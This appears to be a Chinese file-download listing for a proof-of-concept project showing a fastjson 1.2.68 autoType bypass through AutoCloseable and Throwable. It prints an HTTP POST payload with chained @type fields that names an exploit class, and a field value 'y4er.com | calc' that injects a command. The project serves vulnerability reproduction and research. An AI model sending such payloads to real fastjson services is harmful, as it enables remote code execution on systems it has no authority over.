【文件属性】：
文件名称：fastjson-bypass-autotype-1.2.68:fastjson使用Throwable和AutoCloseable绕过自动类型1.2.68
文件大小：63KB
文件格式：ZIP
更新时间：2021-03-08 17:24:26
Java fastjson-bypass-autotype-1.2.68 fastjson因为exceptClass期望类的特性导致可以通过AutoCloseable和Throwable绕过自动类型。 复现 运行org.chabug.fastjson.DemoApplication ，访问 自动关闭绕过 POST /parseObject HTTP/1.1 Host: test.local:8082 Connection: close Content-Type: application/json Content-Length: 131 { "@type":"java.lang.AutoCloseable", "@type": "org.chabug.fastjson.exploit.ExecCloseable", "domain": "y4er.com | calc" } 可投掷绕过
【文件预览】：
fastjson-bypass-autotype-1.2.68-master
----pom.xml(2KB)
----mvnw(10KB)
----src()
--------test()
--------main()
----.gitignore(333B)
----.mvn()
--------wrapper()
----README.md(3KB)
----mvnw.cmd(6KB)